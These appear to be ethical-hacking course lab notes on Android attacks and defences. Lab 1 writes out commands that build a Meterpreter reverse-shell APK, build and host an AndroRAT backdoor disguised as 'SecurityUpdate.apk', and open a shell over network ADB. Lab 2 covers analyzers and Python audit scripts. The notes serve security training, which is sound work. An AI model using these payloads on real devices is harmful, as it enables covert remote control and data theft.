# Module 17: Hacking Mobile Platforms

## Lab 1: Hack Android Devices <a href="#lab-1-hack-android-devices" id="lab-1-hack-android-devices"></a>

**Overview of Hacking Android Platforms**

Android is a software environment developed by Google for mobile devices. It includes an OS, middleware, and key applications. Its Linux-based OS is designed especially for portable devices such as smartphones and tablets. Android has a stack of software components categorized into six sections (System Apps, Java API Framework, Native C/C++ Libraries, Android Runtime, Hardware Abstraction Layer \[HAL], and Linux kernel) and five layers.

Owing to the growing number of Android users, Android devices have become primary targets for hackers. Attackers use various Android hacking tools to discover vulnerabilities in the platform, and then exploit them to carry out attacks such as DoS, Man-in-the-Disk, and Spearphone attacks.

### Task 1: Hack an Android Device by Creating Binary Payloads using Parrot Security <a href="#task-1-hack-an-android-device-by-creating-binary-payloads-using-parrot-security" id="task-1-hack-an-android-device-by-creating-binary-payloads-using-parrot-security"></a>

Attackers use various tools such as Metasploit to create binary payloads, which are sent to the target system to gain control over it. The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. It contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. Meterpreter is a Metasploit attack payload that provides an interactive shell that can be used to explore target machines and execute code.

{% code overflow="wrap" %}

```bash
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.1.13 R > Desktop/Backdoor.apk
```

{% endcode %}

> This command creates an APK (**Backdoor.apk**) on **Desktop** under the **Root** directory. In this case, **10.10.1.13** is the IP address of the **Parrot Security** machine.

### Task 2: Harvest Users’ Credentials using the Social-Engineer Toolkit <a href="#task-2-harvest-users-credentials-using-the-social-engineer-toolkit" id="task-2-harvest-users-credentials-using-the-social-engineer-toolkit"></a>

The Social-Engineer Toolkit (SET) is an open-source, Python-driven tool that enables penetration testing via social engineering. It is a generic exploit that can be used to carry out advanced attacks against human targets in order to get them to offer up sensitive information. SET categorizes attacks according to the attack vector used to trick people, such as email, web, or USB. The toolkit attacks human weakness, exploiting people’s trust, fear, avarice, or helping natures.

### Task 3: Launch a DoS Attack on a Target machine using Low Orbit Ion Cannon (LOIC) on the Android Mobile Platform <a href="#task-3-launch-a-dos-attack-on-a-target-machine-using-low-orbit-ion-cannon-loic-on-the-android-mobile" id="task-3-launch-a-dos-attack-on-a-target-machine-using-low-orbit-ion-cannon-loic-on-the-android-mobile"></a>

Low Orbit Ion Cannon (LOIC) is an open-source network stress testing and Denial-of-Service (DoS) attack application. LOIC performs a DoS attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.

### Task 4: Exploit the Android Platform through ADB using PhoneSploit <a href="#task-4-exploit-the-android-platform-through-adb-using-phonesploit" id="task-4-exploit-the-android-platform-through-adb-using-phonesploit"></a>

Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. ADB facilitates a variety of device actions such as installing and debugging apps, and provides access to a Unix shell that you can use to run several different commands on a device.

Usually, developers connect to ADB on Android devices by using a USB cable, but it is also possible to do so wirelessly by enabling a daemon server at TCP port 5555 on the device.

```bash
python3 -m pip install colorama
```

> `colorama` is a Python library for cross-platform colored terminal text. It simplifies adding colors and styles to terminal output, making it more readable and engaging.

```bash
python3 phonesploit.py
```

* Type **3** and press **Enter** to select the **\[3] Connect a new phone** option.
* When prompted to **Enter a phones ip address**, type the target Android device’s IP address and press **Enter**.
* Now, at the **main\_menu** prompt, type **4** and press **Enter** to choose **Access Shell on a phone**.
* When prompted to **Enter a device name**, type the target Android device’s IP address and press **Enter**.
* A shell command line for the device then appears.
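
From the defender's side, the exposure this task depends on is `adbd` listening on the network. The following added example (not part of the original notes or of PhoneSploit) audits a device's `getprop` dump for the Android system properties that control network ADB; the sample dump is constructed.

```python
import re

# Android system properties that make adbd listen on TCP instead of USB only.
TCP_PORT_PROPS = ("service.adb.tcp.port", "persist.adb.tcp.port")
# `getprop` prints one property per line as `[key]: [value]`.
PROP_LINE = re.compile(r"^\[(?P<key>[^\]]+)\]: \[(?P<value>.*)\]$")

# Constructed sample, as collected from a device you administer.
SAMPLE_GETPROP = """\
[ro.build.type]: [userdebug]
[ro.debuggable]: [1]
[ro.adb.secure]: [0]
[service.adb.tcp.port]: [5555]
[persist.adb.tcp.port]: [-1]
"""


def parse_getprop(text):
    """Parse `getprop` output into a {property: value} dict."""
    props = {}
    for line in text.splitlines():
        match = PROP_LINE.match(line.strip())
        if match:
            props[match.group("key")] = match.group("value")
    return props


def audit_adb(props):
    """Return a list of findings about ADB exposure for one device."""
    findings = []
    for name in TCP_PORT_PROPS:
        value = props.get(name, "")
        # A positive port means adbd listens on TCP; empty, 0 or -1 means USB only.
        if value.isdigit() and int(value) > 0:
            findings.append(f"{name}={value}: adbd listens on TCP port {value}")
    if props.get("ro.adb.secure") == "0":
        findings.append("ro.adb.secure=0: ADB host key authorization is disabled")
    if props.get("ro.debuggable") == "1":
        findings.append("ro.debuggable=1: debuggable build, adbd may run as root")
    return findings


if __name__ == "__main__":
    for finding in audit_adb(parse_getprop(SAMPLE_GETPROP)):
        print("FINDING:", finding)
```
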

### Task 5: Hack an Android Device by Creating APK File using AndroRAT <a href="#task-5-hack-an-android-device-by-creating-apk-file-using-androrat" id="task-5-hack-an-android-device-by-creating-apk-file-using-androrat"></a>

[**`AndroRAT`**](https://github.com/karma9874/AndroRAT) is a tool designed to give control of an Android system to a remote user and to retrieve information from it. AndroRAT is a client/server application: the client side is developed in Java for Android, and the server is written in Python. AndroRAT provides a fully persistent backdoor to the target device, as the app starts automatically on device boot-up. It also obtains the current location, SIM card details, IP address, and MAC address of the device.

{% code overflow="wrap" %}

```bash
python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk
```

{% endcode %}

* **--build**: is used for building the APK
* **-i**: specifies the local IP address (here, **10.10.1.13**)
* **-p**: specifies the port number (here, **4444**)
* **-o**: specifies the output APK file (here, **SecurityUpdate.apk**)

```bash
cp /home/attacker/AndroRAT/SecurityUpdate.apk /var/www/html/share/
```

If the share folder does not exist, then execute the following commands to create a share folder and assign required permissions to it:

* Type **mkdir /var/www/html/share** and press **Enter** to create a shared folder
* Type **chmod -R 755 /var/www/html/share** and press **Enter**
* Type **chown -R www-data:www-data /var/www/html/share** and press **Enter**

```bash
service apache2 start
```

```bash
python3 androRAT.py --shell -i 0.0.0.0 -p 4444
```

* **--shell**: is used for getting the interpreter
* **-i**: specifies the IP address for listening (here, **0.0.0.0**)
* **-p**: specifies the port number (here, **4444**)

You can also use other Android hacking tools such as

* **NetCut** (<https://www.arcai.com>)
* **drozer** (<https://labs.f-secure.com>)
* **zANTI** (<https://www.zimperium.com>)
* **Network Spoofer** (<https://www.digitalsquid.co.uk>)
* **DroidSheep** (<https://droidsheep.info>)

## Lab 2: Secure Android Devices using Various Android Security Tools <a href="#lab-2-secure-android-devices-using-various-android-security-tools" id="lab-2-secure-android-devices-using-various-android-security-tools"></a>

**Overview of Android Security Tools**

Android security tools reveal the security posture of particular Android platforms and devices. You can use them to find various ways to strengthen the security and robustness of your organization’s mobile platforms. These tools automate the process of accurate Android platform security assessment.

### Task 1: Analyze a Malicious App using Online Android Analyzers <a href="#task-1-analyze-a-malicious-app-using-online-android-analyzers" id="task-1-analyze-a-malicious-app-using-online-android-analyzers"></a>

Online Android analyzers allow you to scan Android APK packages and perform security analyses to detect vulnerabilities in particular apps. One trusted online Android analyzer is Sixo Online APK Analyzer.

* **Sixo Online APK Analyzer** (<https://www.sisik.eu/apk-tool>)
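
The same kind of check can be done offline as a first triage step. The following added example (not from the original notes or any analyzer listed here) parses the text printed by `aapt dump permissions <apk>` and flags an app whose requested permissions cover the behaviours described for AndroRAT in Lab 1 Task 5; the behaviour-to-permission mapping is an assumption made for illustration and the sample output is constructed.

```python
import re

# Accepts `uses-permission: name='X'` and the older `uses-permission: X` form.
PERM_LINE = re.compile(r"^uses-permission(?:-sdk-\d+)?:\s*(?:name=')?([\w.]+)")

P = "android.permission."
# Assumed mapping from behaviours described in the notes to Android permissions.
BEHAVIOURS = {
    "starts on boot": {P + "RECEIVE_BOOT_COMPLETED"},
    "reads location": {P + "ACCESS_FINE_LOCATION", P + "ACCESS_COARSE_LOCATION"},
    "reads SIM/device identity": {P + "READ_PHONE_STATE"},
    "network access": {P + "INTERNET"},
}

# Constructed sample of `aapt dump permissions` output.
SAMPLE_AAPT = """\
package: com.example.securityupdate
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.RECEIVE_BOOT_COMPLETED'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
uses-permission: name='android.permission.READ_PHONE_STATE'
uses-permission: name='android.permission.READ_SMS'
"""


def parse_permissions(aapt_output):
    """Collect the permission names requested in the aapt output."""
    perms = set()
    for line in aapt_output.splitlines():
        match = PERM_LINE.match(line.strip())
        if match:
            perms.add(match.group(1))
    return perms


def triage(perms):
    """Report matched behaviours; mark for review when all are present."""
    hits = [label for label, needed in BEHAVIOURS.items() if perms & needed]
    return {"behaviours": hits, "review": len(hits) == len(BEHAVIOURS)}


if __name__ == "__main__":
    print(triage(parse_permissions(SAMPLE_AAPT)))
```

A match is a reason to look closer, not a verdict: many legitimate apps request the same permissions individually.
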

You can also use other Android vulnerability scanners such as

* **X-Ray 2.0** (<https://duo.com>)
* **Vulners Scanner** (<https://play.google.com>)
* **Shellshock Scanner - Zimperium** (<https://play.google.com>)
* **Yaazhini** (<https://www.vegabird.com>)
* **Quick Android Review Kit (QARK)** (<https://github.com>)

### Task 2: Secure Android Devices from Malicious Apps using Malwarebytes Security <a href="#task-2-secure-android-devices-from-malicious-apps-using-malwarebytes-security" id="task-2-secure-android-devices-from-malicious-apps-using-malwarebytes-security"></a>

Malwarebytes is an antimalware mobile tool that provides protection against malware, ransomware, and other growing threats to Android devices. It blocks, detects, and removes adware and malware; conducts privacy audits for all apps; and ensures safer browsing.

You can use other mobile antivirus and anti-spyware tools such as

* **AntiSpy Mobile** (<https://antispymobile.com>)
* **Spyware Detector - Spy Scanner** (<https://play.google.com>)
* **iAmNotified - Anti Spy System** (<https://iamnotified.com>)
* **Privacy Scanner (AntiSpy) Free** (<https://play.google.com>)

***


**`Hacker's Mantra:`**`Pattern is often predictable, and anything predictable can be hacked. - Aniekee Tochukwu Ezekiel`

